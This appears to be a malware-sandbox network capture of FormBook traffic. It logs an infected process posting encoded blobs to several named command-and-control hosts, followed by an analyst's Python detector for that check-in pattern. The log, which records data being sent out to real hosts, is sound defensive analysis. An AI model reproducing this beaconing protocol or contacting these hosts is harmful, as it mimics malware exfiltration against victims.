                                        Data Ascii: 3h-p=2uNK5fNbRgxsLzFy8RDoFwMn8Wcfu2caDTcDDiCKXh3PFS6+CrZ127IWDVSPYPP5ppTZ8VJhcUK4W8ESoboPknXCUmENOuBUvib9MaAlb3dJGqU2zblVshnSUJdbSydxD+TJWMwzXI35J5Or7Qhf9nuw4q3SR4ME4J23vKlTOFEobjhzqzI+T1QIBswqIHIv1u7OwfZNN/JSfnQnVQ==


                                        Session ID: 14 | Source: 192.168.2.7:54966 | Destination: 3.33.130.190:80 | PID: 2340 | Process: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        Timestamp: Sep 27, 2024 06:36:19.599750042 CEST | Bytes transferred: 758 | Direction: OUT | Data:
                                        POST /05bk/ HTTP/1.1
                                        Host: www.softillery.info
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-us
                                        Origin: http://www.softillery.info
                                        Content-Length: 237
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Type: application/x-www-form-urlencoded
                                        Referer: http://www.softillery.info/05bk/
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Data Raw: 33 68 2d 70 3d 32 75 4e 4b 35 66 4e 62 52 67 78 73 4b 54 31 79 2f 79 37 6f 56 67 4d 6f 67 47 63 66 6b 57 64 52 44 54 41 44 44 6e 69 61 58 54 6a 50 45 77 79 2b 44 75 74 31 31 37 49 57 4c 31 53 77 57 76 50 49 70 70 65 35 38 56 46 68 63 55 65 34 57 2b 63 53 6f 6f 77 4f 6b 33 58 41 42 57 45 54 4e 65 42 55 76 69 62 39 4d 5a 38 4c 62 7a 4a 4a 47 61 6b 32 7a 35 4e 55 67 42 6e 64 54 4a 64 62 57 79 64 31 44 2b 54 76 57 49 51 5a 58 4b 2f 35 4a 37 57 72 37 42 68 63 6b 58 75 71 79 4b 33 46 56 74 31 7a 68 4d 48 50 71 72 68 4c 41 56 45 32 65 56 38 52 77 52 45 53 4e 6b 6f 7a 46 75 55 63 66 68 56 61 33 76 2f 57 39 39 74 73 53 49 73 34 53 31 78 6a 44 69 31 59 75 75 68 4a 58 59 74 51 43 31 36 39 6a 48 76 4f 75 36 6f 3d
                                        Data Ascii: 3h-p=2uNK5fNbRgxsKT1y/y7oVgMogGcfkWdRDTADDniaXTjPEwy+Dut117IWL1SwWvPIppe58VFhcUe4W+cSoowOk3XABWETNeBUvib9MZ8LbzJJGak2z5NUgBndTJdbWyd1D+TvWIQZXK/5J7Wr7BhckXuqyK3FVt1zhMHPqrhLAVE2eV8RwRESNkozFuUcfhVa3v/W99tsSIs4S1xjDi1YuuhJXYtQC169jHvOu6o=


                                        Session ID: 15 | Source: 192.168.2.7:54967 | Destination: 3.33.130.190:80 | PID: 2340 | Process: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        Timestamp: Sep 27, 2024 06:36:22.174774885 CEST | Bytes transferred: 1771 | Direction: OUT | Data:
                                        POST /05bk/ HTTP/1.1
                                        Host: www.softillery.info
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-us
                                        Origin: http://www.softillery.info
                                        Content-Length: 1249
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Type: application/x-www-form-urlencoded
                                        Referer: http://www.softillery.info/05bk/
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Data Raw: 33 68 2d 70 3d 32 75 4e 4b 35 66 4e 62 52 67 78 73 4b 54 31 79 2f 79 37 6f 56 67 4d 6f 67 47 63 66 6b 57 64 52 44 54 41 44 44 6e 69 61 58 54 37 50 45 43 4b 2b 43 4a 42 31 30 37 49 57 42 56 53 31 57 76 50 56 70 70 57 31 38 56 5a 78 63 58 6d 34 5a 37 49 53 67 35 77 4f 78 48 58 41 65 47 45 4f 4f 75 42 46 76 6d 32 36 4d 61 45 4c 62 7a 4a 4a 47 63 67 32 78 72 6c 55 6d 42 6e 53 55 4a 64 58 53 79 63 69 44 2b 4b 61 57 4a 51 6a 57 36 66 35 4a 62 47 72 32 54 5a 63 37 6e 75 73 31 4b 32 41 56 74 78 73 68 49 6d 32 71 72 46 78 41 53 49 32 66 68 31 6e 73 46 45 64 55 31 73 47 4b 50 6b 59 58 51 78 48 79 65 54 36 39 66 41 4c 4f 76 59 62 5a 53 35 39 42 6c 4a 46 78 2f 39 36 57 73 52 45 49 79 76 4e 6e 56 4b 4d 32 64 31 5a 64 58 6e 67 4b 75 55 7a 57 2f 5a 6c 31 44 58 63 76 36 72 56 6c 6e 43 39 55 45 63 42 64 4d 39 4c 65 66 79 4e 4c 4f 35 45 30 75 46 57 77 59 32 39 78 47 4f 59 43 57 52 73 76 2f 57 6a 50 47 78 73 47 57 35 6b 48 65 2f 4f 48 71 68 4f 46 42 33 4f 47 4d 43 75 4c 2b 30 56 46 58 52 67 6b 38 35 70 49 46 39 52 53 [TRUNCATED]
                                        Data Ascii: 3h-p= [TRUNCATED]


                                        Session ID: 16 | Source: 192.168.2.7:54968 | Destination: 3.33.130.190:80 | PID: 2340 | Process: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        Timestamp: Sep 27, 2024 06:36:24.737642050 CEST | Bytes transferred: 472 | Direction: OUT | Data:
                                        GET /05bk/?3h-p=7slq6roGbUYIGCZK/AHLAj192Fgd/VphPEARDFaBZgyILhyhf/dU1Jg1HH64YML39LGaxm9NI1GZWNYUnLUXyXLdbmUNBKZzgEadXvwwUw5uXrkOz5o90nGwS6h8GF9GBt2NTtUZfNeM&yP=MxXHdlzpQrd0 HTTP/1.1
                                        Host: www.softillery.info
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-us
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Timestamp: Sep 27, 2024 06:36:25.188066959 CEST | Bytes transferred: 416 | Direction: IN | Data:
                                        HTTP/1.1 200 OK
                                        Server: openresty
                                        Date: Fri, 27 Sep 2024 04:36:25 GMT
                                        Content-Type: text/html
                                        Content-Length: 276
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 33 68 2d 70 3d 37 73 6c 71 36 72 6f 47 62 55 59 49 47 43 5a 4b 2f 41 48 4c 41 6a 31 39 32 46 67 64 2f 56 70 68 50 45 41 52 44 46 61 42 5a 67 79 49 4c 68 79 68 66 2f 64 55 31 4a 67 31 48 48 36 34 59 4d 4c 33 39 4c 47 61 78 6d 39 4e 49 31 47 5a 57 4e 59 55 6e 4c 55 58 79 58 4c 64 62 6d 55 4e 42 4b 5a 7a 67 45 61 64 58 76 77 77 55 77 35 75 58 72 6b 4f 7a 35 6f 39 30 6e 47 77 53 36 68 38 47 46 39 47 42 74 32 4e 54 74 55 5a 66 4e 65 4d 26 79 50 3d 4d 78 58 48 64 6c 7a 70 51 72 64 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?3h-p=7slq6roGbUYIGCZK/AHLAj192Fgd/VphPEARDFaBZgyILhyhf/dU1Jg1HH64YML39LGaxm9NI1GZWNYUnLUXyXLdbmUNBKZzgEadXvwwUw5uXrkOz5o90nGwS6h8GF9GBt2NTtUZfNeM&yP=MxXHdlzpQrd0"}</script></head></html>


                                        Session ID: 17 | Source: 192.168.2.7:54969 | Destination: 3.33.130.190:80 | PID: 2340 | Process: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        Timestamp: Sep 27, 2024 06:36:30.289741993 CEST | Bytes transferred: 750 | Direction: OUT | Data:
                                        POST /43nw/ HTTP/1.1
                                        Host: www.asiapartnars.online
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-us
                                        Origin: http://www.asiapartnars.online
                                        Content-Length: 217
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Type: application/x-www-form-urlencoded
                                        Referer: http://www.asiapartnars.online/43nw/
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Data Raw: 33 68 2d 70 3d 65 54 44 51 75 43 33 47 31 6f 75 63 39 6b 66 6a 32 52 46 7a 46 63 66 4b 7a 74 76 4a 4f 50 62 42 74 6f 2b 41 6f 55 7a 6b 74 39 34 54 7a 54 37 66 6b 2b 2f 5a 33 54 65 4b 4d 62 54 4a 52 58 53 44 68 4b 35 41 31 2b 45 72 39 78 30 69 55 4e 4a 6e 37 62 6f 72 54 41 53 4c 55 68 51 62 38 55 45 50 44 67 4e 5a 63 71 68 44 47 30 7a 77 32 6a 59 55 54 51 72 45 32 67 2b 4c 6a 6b 4a 73 53 4b 68 77 4d 49 56 35 54 31 49 36 71 63 43 59 76 6a 38 5a 37 48 52 39 42 39 6c 78 4c 75 58 61 39 74 34 79 41 61 72 62 55 4d 7a 2f 4e 66 72 39 2f 48 46 53 63 42 54 48 64 5a 49 57 48 63 6b 65 2b 2b 37 75 47 33 48 38 4c 59 47 57 4f 62 75 75 4b 7a 78 70 6e 77 3d 3d
                                        Data Ascii: 3h-p=eTDQuC3G1ouc9kfj2RFzFcfKztvJOPbBto+AoUzkt94TzT7fk+/Z3TeKMbTJRXSDhK5A1+Er9x0iUNJn7borTASLUhQb8UEPDgNZcqhDG0zw2jYUTQrE2g+LjkJsSKhwMIV5T1I6qcCYvj8Z7HR9B9lxLuXa9t4yAarbUMz/Nfr9/HFScBTHdZIWHcke++7uG3H8LYGWObuuKzxpnw==


                                        Session ID: 18 | Source: 192.168.2.7:54970 | Destination: 3.33.130.190:80 | PID: 2340 | Process: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        Timestamp: Sep 27, 2024 06:36:32.842016935 CEST | Bytes transferred: 770 | Direction: OUT | Data:
                                        POST /43nw/ HTTP/1.1
                                        Host: www.asiapartnars.online
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-us
                                        Origin: http://www.asiapartnars.online
                                        Content-Length: 237
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Type: application/x-www-form-urlencoded
                                        Referer: http://www.asiapartnars.online/43nw/
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Data Raw: 33 68 2d 70 3d 65 54 44 51 75 43 33 47 31 6f 75 63 38 46 76 6a 6c 77 46 7a 4d 63 66 4a 76 39 76 4a 48 76 62 64 74 6f 69 41 6f 52 54 4b 73 50 63 54 79 78 6a 66 6c 38 62 5a 32 54 65 4b 48 37 54 4d 63 33 53 55 68 4b 31 49 31 37 38 72 39 78 67 69 55 4a 4e 6e 37 71 6f 30 53 51 53 46 49 68 51 64 34 55 45 50 44 67 4e 5a 63 71 63 6d 47 31 58 77 32 7a 6f 55 42 6b 66 4c 71 77 2b 49 7a 30 4a 73 46 61 68 30 4d 49 56 4c 54 30 46 52 71 61 47 59 76 69 4d 5a 37 57 52 2b 4c 39 6b 30 46 4f 57 36 32 34 64 65 50 62 7a 42 57 75 76 58 49 73 72 4b 33 52 59 77 47 6a 66 72 44 49 77 74 44 65 41 6f 70 59 6d 62 45 32 44 6b 47 36 79 33 52 73 4c 45 48 68 51 74 78 46 61 6b 75 4d 38 65 31 59 63 4f 72 6c 7a 66 54 78 68 68 50 49 59 3d
                                        Data Ascii: 3h-p=eTDQuC3G1ouc8FvjlwFzMcfJv9vJHvbdtoiAoRTKsPcTyxjfl8bZ2TeKH7TMc3SUhK1I178r9xgiUJNn7qo0SQSFIhQd4UEPDgNZcqcmG1Xw2zoUBkfLqw+Iz0JsFah0MIVLT0FRqaGYviMZ7WR+L9k0FOW624dePbzBWuvXIsrK3RYwGjfrDIwtDeAopYmbE2DkG6y3RsLEHhQtxFakuM8e1YcOrlzfTxhhPIY=


                                        Session ID: 19 | Source: 192.168.2.7:54971 | Destination: 3.33.130.190:80 | PID: 2340 | Process: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        Timestamp: Sep 27, 2024 06:36:35.396697998 CEST | Bytes transferred: 1783 | Direction: OUT | Data:
                                        POST /43nw/ HTTP/1.1
                                        Host: www.asiapartnars.online
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-us
                                        Origin: http://www.asiapartnars.online
                                        Content-Length: 1249
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Type: application/x-www-form-urlencoded
                                        Referer: http://www.asiapartnars.online/43nw/
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Data Raw: 33 68 2d 70 3d 65 54 44 51 75 43 33 47 31 6f 75 63 38 46 76 6a 6c 77 46 7a 4d 63 66 4a 76 39 76 4a 48 76 62 64 74 6f 69 41 6f 52 54 4b 73 50 55 54 79 43 72 66 6b 63 6e 5a 31 54 65 4b 62 72 54 4e 63 33 54 57 68 4b 74 4d 31 37 34 42 39 79 59 69 55 73 5a 6e 39 59 4d 30 62 51 53 46 44 42 51 59 38 55 45 67 44 67 64 64 63 75 38 6d 47 31 58 77 32 31 4d 55 44 77 72 4c 36 41 2b 4c 6a 6b 4a 6f 53 4b 68 63 4d 49 64 78 54 30 41 71 71 71 6d 59 76 43 63 5a 35 6b 4a 2b 44 39 6b 36 47 4f 57 59 32 34 5a 42 50 66 54 72 57 76 4c 35 49 75 37 4b 6e 48 4a 7a 5a 54 65 78 43 59 34 34 41 64 6b 4c 67 35 4f 75 65 57 50 6f 50 34 79 49 63 2b 7a 75 50 54 6f 51 77 68 58 56 7a 66 4a 74 36 4b 30 34 71 67 43 46 4b 44 64 36 56 66 41 6c 48 6c 5a 41 38 42 35 6b 54 74 4c 6f 65 55 74 63 74 2b 33 35 4d 66 77 35 50 57 4c 6a 79 6e 54 67 4d 4e 50 47 4d 5a 78 74 4a 69 66 69 31 52 41 56 6b 4d 34 42 42 72 6e 57 30 64 4f 31 32 70 56 56 71 64 4d 33 6d 41 6b 77 5a 6f 43 4f 39 6d 57 63 7a 4a 71 44 69 6e 33 70 44 47 6c 72 32 33 74 34 50 50 37 54 75 [TRUNCATED]
                                        Data Ascii: 3h-p= [TRUNCATED]


                                        Session ID: 20 | Source: 192.168.2.7:54972 | Destination: 3.33.130.190:80 | PID: 2340 | Process: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        Timestamp: Sep 27, 2024 06:36:37.969007015 CEST | Bytes transferred: 476 | Direction: OUT | Data:
                                        GET /43nw/?yP=MxXHdlzpQrd0&3h-p=TRrwt1Lp84Si32vs8BwRNNCulMjKfdr7iMjgkGLejtYz7grWw7bT5zKsM4PORiqIxohG3+sDrwsXXfU947RLBQy8IxkH7FUKKiRlKageAzPI0SYRDznkpg/s6UBWT6V3P6UmeH8wgKTy HTTP/1.1
                                        Host: www.asiapartnars.online
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-us
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Timestamp: Sep 27, 2024 06:36:38.438513041 CEST | Bytes transferred: 416 | Direction: IN | Data:
                                        HTTP/1.1 200 OK
                                        Server: openresty
                                        Date: Fri, 27 Sep 2024 04:36:38 GMT
                                        Content-Type: text/html
                                        Content-Length: 276
                                        Connection: close
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 79 50 3d 4d 78 58 48 64 6c 7a 70 51 72 64 30 26 33 68 2d 70 3d 54 52 72 77 74 31 4c 70 38 34 53 69 33 32 76 73 38 42 77 52 4e 4e 43 75 6c 4d 6a 4b 66 64 72 37 69 4d 6a 67 6b 47 4c 65 6a 74 59 7a 37 67 72 57 77 37 62 54 35 7a 4b 73 4d 34 50 4f 52 69 71 49 78 6f 68 47 33 2b 73 44 72 77 73 58 58 66 55 39 34 37 52 4c 42 51 79 38 49 78 6b 48 37 46 55 4b 4b 69 52 6c 4b 61 67 65 41 7a 50 49 30 53 59 52 44 7a 6e 6b 70 67 2f 73 36 55 42 57 54 36 56 33 50 36 55 6d 65 48 38 77 67 4b 54 79 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?yP=MxXHdlzpQrd0&3h-p=TRrwt1Lp84Si32vs8BwRNNCulMjKfdr7iMjgkGLejtYz7grWw7bT5zKsM4PORiqIxohG3+sDrwsXXfU947RLBQy8IxkH7FUKKiRlKageAzPI0SYRDznkpg/s6UBWT6V3P6UmeH8wgKTy"}</script></head></html>


                                        Session ID: 21 | Source: 192.168.2.7:54973 | Destination: 162.0.238.238:80 | PID: 2340 | Process: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
                                        Timestamp: Sep 27, 2024 06:36:43.500741959 CEST | Bytes transferred: 735 | Direction: OUT | Data:
                                        POST /orig/ HTTP/1.1
                                        Host: www.priunit.online
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-us
                                        Origin: http://www.priunit.online
                                        Content-Length: 217
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Type: application/x-www-form-urlencoded
                                        Referer: http://www.priunit.online/orig/
                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
                                        Data Raw: 33 68 2d 70 3d 6d 2f 45 65 38 79 32 69 44 31 65 77 61 7a 62 5a 63 68 64 4f 69 47 64 2b 68 4d 48 6a 51 69 50 76 4a 34 57 42 2b 6d 41 79 4b 73 6c 6a 42 4c 74 75 50 30 74 33 62 61 49 37 43 31 32 54 34 52 43 5a 39 68 63 64 55 33 44 79 64 6e 71 59 77 6c 68 59 64 79 42 45 63 39 4a 65 2b 41 56 35 49 4a 33 6e 79 52 4b 45 5a 79 62 51 65 65 39 68 32 4f 72 2b 34 61 78 69 47 74 58 47 36 71 6e 2f 71 45 4c 41 4f 76 64 6c 67 79 6c 76 45 31 38 47 32 52 34 36 46 49 34 50 63 65 44 41 46 71 5a 4e 56 69 55 47 56 37 4b 54 79 2f 35 75 70 4f 4c 55 4e 70 2b 2b 77 42 50 59 5a 64 74 2b 41 46 4f 47 52 6a 65 6e 76 57 50 35 32 43 36 63 6d 44 39 64 5a 6e 57 62 6f 67 3d 3d
                                        Data Ascii: 3h-p=m/Ee8y2iD1ewazbZchdOiGd+hMHjQiPvJ4WB+mAyKsljBLtuP0t3baI7C12T4RCZ9hcdU3DydnqYwlhYdyBEc9Je+AV5IJ3nyRKEZybQee9h2Or+4axiGtXG6qn/qELAOvdlgylvE18G2R46FI4PceDAFqZNViUGV7KTy/5upOLUNp++wBPYZdt+AFOGRjenvWP52C6cmD9dZnWbog==
                                        Timestamp: Sep 27, 2024 06:36:44.078306913 CEST | Bytes transferred: 595 | Direction: IN | Data:
                                        HTTP/1.1 404 Not Found
                                        Date: Fri, 27 Sep 2024 04:36:43 GMT
                                        Server: Apache
                                        X-Frame-Options: SAMEORIGIN
                                        Content-Length: 389
                                        X-XSS-Protection: 1; mode=block
                                        Connection: close
                                        Content-Type: text/html
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
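The sessions above all have the same shape, and that shape is the thing to detect rather than any one of the domains: the injected process POSTs to a four-character directory (/3632/, /05bk/, /43nw/, /orig/) with a single form field 3h-p holding a base64-alphabet blob, sends three such POSTs of 217, 237 and 1249 bytes, then issues a GET carrying the same field plus yP=MxXHdlzpQrd0, and moves on to the next domain. Origin and Referer always point back at the contacted host, every request carries Connection: close and Cache-Control: no-cache, and the User-Agent is the same coc_coc_browser string throughout. Within one host the first twelve characters of the POST blob never change (UBDScUO6Ogll for www.sapatarias.online, 2uNK5fNbRgxs for www.softillery.info, eTDQuC3G1ouc for www.asiapartnars.online, m/Ee8y2iD1ew for www.priunit.online), while the responses range from an openresty /lander redirect to a plain Apache 404, so the server side is not a useful discriminator. The Python detector below is an added example, not part of the Joe Sandbox report and not FormBook code: it parses raw HTTP/1.1 requests and scores each Host against those traits. The indicator names, the PREFIX_LEN and min_hits thresholds, and the sample requests (copies of the sapatarias.online requests with the blobs cut short, plus a constructed benign login POST to a made-up intranet host) are the example's own.

```python
"""Score raw HTTP requests against the FormBook check-in shape in this capture.
Added example, not code from the Joe Sandbox report or from FormBook."""
import re
from collections import defaultdict

PATH_RE = re.compile(r"^/[A-Za-z0-9]{4}/$")         # /3632/, /05bk/, /43nw/, /orig/
BLOB_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")  # base64-alphabet payload
PREFIX_LEN = 12  # blob prefix that stayed constant per host in this capture (own choice)

def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, path, query, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    path, _, query = target.partition("?")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "query": query, "headers": headers, "body": body}

def split_form(encoded: str) -> list:
    """Split k=v&k=v without decoding, so '+' and '/' inside the blob survive."""
    pairs = []
    for part in filter(None, encoded.split("&")):
        key, _, value = part.partition("=")
        pairs.append((key, value))
    return pairs

def request_indicators(req: dict) -> set:
    """Names of the traits one request exhibits (empty set for ordinary traffic)."""
    h, hits = req["headers"], set()
    host = h.get("host", "")
    if PATH_RE.match(req["path"]):
        hits.add("four-char-dir")
    if "coc_coc_browser" in h.get("user-agent", ""):
        hits.add("coc-coc-ua")
    if h.get("connection", "").lower() == "close" and h.get("cache-control", "").lower() == "no-cache":
        hits.add("close-no-cache")
    if req["method"] == "POST":
        params = split_form(req["body"])
        if len(params) == 1 and len(params[0][0]) <= 4 and BLOB_RE.match(params[0][1]):
            hits.add("single-blob-form")
        if h.get("origin") == f"http://{host}" and h.get("referer") == f"http://{host}{req['path']}":
            hits.add("self-referer")
    elif req["method"] == "GET":
        params = dict(split_form(req["query"]))
        if "yP" in params and any(BLOB_RE.match(v) for k, v in params.items() if k != "yP"):
            hits.add("blob-in-query")
    return hits

def flag_hosts(raw_requests: list, min_hits: int = 5) -> dict:
    """{host: sorted indicators} for hosts with at least min_hits distinct traits.
    'constant-blob-prefix' is added when two or more single-field POST blobs to
    the same host share their first PREFIX_LEN characters, as every host above does."""
    per_host, prefixes = defaultdict(set), defaultdict(list)
    for raw in raw_requests:
        req = parse_request(raw)
        host = req["headers"].get("host", "")
        per_host[host] |= request_indicators(req)
        if req["method"] == "POST" and len(params := split_form(req["body"])) == 1:
            prefixes[host].append(params[0][1][:PREFIX_LEN])
    for host, seen in prefixes.items():
        if len(seen) >= 2 and len(set(seen)) == 1:
            per_host[host].add("constant-blob-prefix")
    return {h: sorted(v) for h, v in per_host.items() if len(v) >= min_hits}

# Constructed sample: two POSTs and the GET to www.sapatarias.online copied from
# the capture above (blobs cut short), plus an ordinary login POST to a made-up
# intranet host that must not be flagged.
FB_UA = ("Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "
         "coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36")
C2 = "www.sapatarias.online"
C2_POST_HEADERS = [f"Host: {C2}", f"Origin: http://{C2}", "Connection: close",
                   "Cache-Control: no-cache", "Content-Type: application/x-www-form-urlencoded",
                   f"Referer: http://{C2}/3632/", f"User-Agent: {FB_UA}"]

def raw_request(lines: list, body: str = "") -> str:
    return "\r\n".join(lines) + "\r\n\r\n" + body

SAMPLES = [
    raw_request(["POST /3632/ HTTP/1.1", *C2_POST_HEADERS],
                "3h-p=UBDScUO6OgllbdQn3otNIUOZPsodSDYDWOE3jm3rn7XxYhhn8H4x"),
    raw_request(["POST /3632/ HTTP/1.1", *C2_POST_HEADERS],
                "3h-p=UBDScUO6Oglla4YnyL1NP0OaRcodFTYHWO43jnD7nJzxYFlnzjsx"),
    raw_request(["GET /3632/?3h-p=ZDryfjaLHwBnUqUAz7hpA2/hGP9eBzcfaY0viGDquKnL&yP=MxXHdlzpQrd0 HTTP/1.1",
                 f"Host: {C2}", "Connection: close", f"User-Agent: {FB_UA}"]),
    raw_request(["POST /login HTTP/1.1", "Host: intranet.example", "Origin: https://intranet.example",
                 "Content-Type: application/x-www-form-urlencoded",
                 "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/130.0"],
                "username=alice&password=hunter2&remember=1"),
]

if __name__ == "__main__":
    for host, hits in flag_hosts(SAMPLES).items():
        print(f"{host}: {', '.join(hits)}")
```

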